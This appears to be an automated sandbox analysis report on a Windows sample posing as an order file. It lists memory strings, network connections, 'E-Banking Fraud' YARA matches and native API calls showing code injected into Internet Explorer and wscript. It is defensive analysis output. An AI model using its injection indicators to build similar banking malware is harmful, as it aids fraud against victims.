                Source: experience.b374b0d5b40196862f17[1].js.16.drString found in binary or memory: https://www.msn.com/fr-ch/actualite/other/Mentions-l
                Source: wscript.exe, 0000000C.00000002.4498888550.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/ocid=iehpOb
                Source: me[1].json.29.drString found in binary or memory: https://www.nbcnews.com/tech/internet/bankruptcy-judge-rejects-onions-bid-buy-alex-jones-infowars-rc
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.rbc.ru/technology_and_media/
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_server&
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_new&am
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&amp;
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.synd.fun&amp;reg_source=parking_auto
                Source: wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ripe.net/
                Source: me[1].json.29.drString found in binary or memory: https://www.telegraph.co.uk/tv/0/dune-prophecy-dune-frank-herberts-dune/
                Source: BBI4MeJ[1].json.29.drString found in binary or memory: https://www.whskysr.com/27MTDK4Q/GG1SRSH/?uid=43019&sub1=enus3-1211
                Source: me[1].json.29.drString found in binary or memory: https://www.yardbarker.com/entertainment/articles/20_facts_you_might_not_know_about_young_frankenste
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.5:49832 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.5:49831 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49826 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49825 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49849 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.165.220.110:443 -> 192.168.2.5:49848 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.5:49879 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.5:49878 version: TLS 1.2

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 5.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2334142398.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4500032925.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0042CB93 NtClose,5_2_0042CB93
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C35C0 NtCreateMutant,LdrInitializeThunk,5_2_032C35C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2B60 NtClose,LdrInitializeThunk,5_2_032C2B60
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_032C2DF0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_032C2C70
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C4340 NtSetContextThread,5_2_032C4340
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C3010 NtOpenDirectoryObject,5_2_032C3010
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C3090 NtSetValueKey,5_2_032C3090
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C4650 NtSuspendThread,5_2_032C4650
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2BA0 NtEnumerateValueKey,5_2_032C2BA0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2B80 NtQueryInformationFile,5_2_032C2B80
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2BE0 NtQueryValueKey,5_2_032C2BE0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2BF0 NtAllocateVirtualMemory,5_2_032C2BF0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2AB0 NtWaitForSingleObject,5_2_032C2AB0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2AF0 NtWriteFile,5_2_032C2AF0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2AD0 NtReadFile,5_2_032C2AD0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C39B0 NtGetContextThread,5_2_032C39B0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2F30 NtCreateSection,5_2_032C2F30
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2F60 NtCreateProcessEx,5_2_032C2F60
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2FA0 NtQuerySection,5_2_032C2FA0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2FB0 NtResumeThread,5_2_032C2FB0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2F90 NtProtectVirtualMemory,5_2_032C2F90
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2FE0 NtCreateFile,5_2_032C2FE0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2E30 NtWriteVirtualMemory,5_2_032C2E30
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2EA0 NtAdjustPrivilegesToken,5_2_032C2EA0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2E80 NtReadVirtualMemory,5_2_032C2E80
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2EE0 NtQueueApcThread,5_2_032C2EE0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2D30 NtUnmapViewOfSection,5_2_032C2D30
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2D00 NtSetInformationFile,5_2_032C2D00
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C3D10 NtOpenProcessToken,5_2_032C3D10
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2D10 NtMapViewOfSection,5_2_032C2D10
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C3D70 NtOpenThread,5_2_032C3D70
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2DB0 NtEnumerateKey,5_2_032C2DB0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2DD0 NtDelayExecution,5_2_032C2DD0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2C00 NtQueryInformationProcess,5_2_032C2C00
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2C60 NtCreateKey,5_2_032C2C60
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2CA0 NtQueryInformationToken,5_2_032C2CA0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2CF0 NtOpenProcess,5_2_032C2CF0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C2CC0 NtQueryVirtualMemory,5_2_032C2CC0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049335C0 NtCreateMutant,LdrInitializeThunk,12_2_049335C0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04934650 NtSuspendThread,LdrInitializeThunk,12_2_04934650
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04933090 NtSetValueKey,LdrInitializeThunk,12_2_04933090
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04934340 NtSetContextThread,LdrInitializeThunk,12_2_04934340
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04932CA0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04932C70
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932C60 NtCreateKey,LdrInitializeThunk,12_2_04932C60
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932DD0 NtDelayExecution,LdrInitializeThunk,12_2_04932DD0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04932DF0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04932D10
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04932D30
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04932E80
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04932EE0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932FB0 NtResumeThread,LdrInitializeThunk,12_2_04932FB0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932FE0 NtCreateFile,LdrInitializeThunk,12_2_04932FE0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932F30 NtCreateSection,LdrInitializeThunk,12_2_04932F30
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049339B0 NtGetContextThread,LdrInitializeThunk,12_2_049339B0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932AD0 NtReadFile,LdrInitializeThunk,12_2_04932AD0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932AF0 NtWriteFile,LdrInitializeThunk,12_2_04932AF0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04932BA0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04932BF0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04932BE0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932B60 NtClose,LdrInitializeThunk,12_2_04932B60
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04933010 NtOpenDirectoryObject,12_2_04933010
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932CC0 NtQueryVirtualMemory,12_2_04932CC0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932CF0 NtOpenProcess,12_2_04932CF0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932C00 NtQueryInformationProcess,12_2_04932C00
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932DB0 NtEnumerateKey,12_2_04932DB0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04933D10 NtOpenProcessToken,12_2_04933D10
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932D00 NtSetInformationFile,12_2_04932D00
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04933D70 NtOpenThread,12_2_04933D70
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932EA0 NtAdjustPrivilegesToken,12_2_04932EA0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932E30 NtWriteVirtualMemory,12_2_04932E30
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932F90 NtProtectVirtualMemory,12_2_04932F90
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932FA0 NtQuerySection,12_2_04932FA0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932F60 NtCreateProcessEx,12_2_04932F60
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932AB0 NtWaitForSingleObject,12_2_04932AB0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04932B80 NtQueryInformationFile,12_2_04932B80
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_003793C0 NtCreateFile,12_2_003793C0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_00379530 NtReadFile,12_2_00379530
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_00379630 NtDeleteFile,12_2_00379630
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_003796E0 NtClose,12_2_003796E0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_00379850 NtAllocateVirtualMemory,12_2_00379850
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847152F480_2_00007FF847152F48
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847152F800_2_00007FF847152F80
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF84717B4600_2_00007FF84717B460
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847152C450_2_00007FF847152C45
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF84717B3E80_2_00007FF84717B3E8
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847150A760_2_00007FF847150A76
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF84715212D0_2_00007FF84715212D
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847151F400_2_00007FF847151F40
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF84717B4500_2_00007FF84717B450
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF8471513370_2_00007FF847151337
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF84726015E0_2_00007FF84726015E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_00418A035_2_00418A03
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_004029505_2_00402950
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0042F1E35_2_0042F1E3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_004102035_2_00410203
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_004032105_2_00403210
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_00416C0E5_2_00416C0E
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_00416C135_2_00416C13
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0040E4195_2_0040E419
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_004104235_2_00410423
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0040E4235_2_0040E423
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_004025405_2_00402540
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0040E5675_2_0040E567
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0040E5735_2_0040E573
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334132D5_2_0334132D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334A3525_2_0334A352
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D34C5_2_0327D34C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032D739A5_2_032D739A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033503E65_2_033503E6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E3F05_2_0329E3F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033302745_2_03330274
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032952A05_2_032952A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033312ED5_2_033312ED
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB2C05_2_032AB2C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032801005_2_03280100
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332A1185_2_0332A118
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032C516C5_2_032C516C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327F1725_2_0327F172
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0335B16B5_2_0335B16B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329B1B05_2_0329B1B0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033501AA5_2_033501AA
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033481CC5_2_033481CC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334F0E05_2_0334F0E0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033470E95_2_033470E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032970C05_2_032970C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333F0CC5_2_0333F0CC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032907705_2_03290770
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B47505_2_032B4750
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334F7B05_2_0334F7B0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328C7C05_2_0328C7C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AC6E05_2_032AC6E0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033416CC5_2_033416CC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032905355_2_03290535
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033475715_2_03347571
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332D5B05_2_0332D5B0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033505915_2_03350591
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334F43F5_2_0334F43F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032814605_2_03281460
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033424465_2_03342446
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333E4F65_2_0333E4F6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334FB765_2_0334FB76
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334AB405_2_0334AB40
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AFB805_2_032AFB80
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032CDBF95_2_032CDBF9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03346BD75_2_03346BD7
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03303A6C5_2_03303A6C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03347A465_2_03347A46
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334FA495_2_0334FA49
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032D5AA05_2_032D5AA0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332DAAC5_2_0332DAAC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328EA805_2_0328EA80
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333DAC65_2_0333DAC6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A69625_2_032A6962
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032999505_2_03299950
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AB9505_2_032AB950
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032929A05_2_032929A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0335A9A65_2_0335A9A6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FD8005_2_032FD800
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032928405_2_03292840
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329A8405_2_0329A840
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032768B85_2_032768B8
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032938E05_2_032938E0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BE8F05_2_032BE8F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032D2F285_2_032D2F28
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B0F305_2_032B0F30
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334FF095_2_0334FF09
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03304F405_2_03304F40
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334FFB15_2_0334FFB1
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03291F925_2_03291F92
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329CFE05_2_0329CFE0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03282FC85_2_03282FC8
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334EE265_2_0334EE26
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290E595_2_03290E59
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03299EB05_2_03299EB0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334CE935_2_0334CE93
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A2E905_2_032A2E90
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334EEDB5_2_0334EEDB
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329AD005_2_0329AD00
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03347D735_2_03347D73
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03293D405_2_03293D40
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03341D5A5_2_03341D5A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A8DBF5_2_032A8DBF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328ADE05_2_0328ADE0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AFDC05_2_032AFDC0
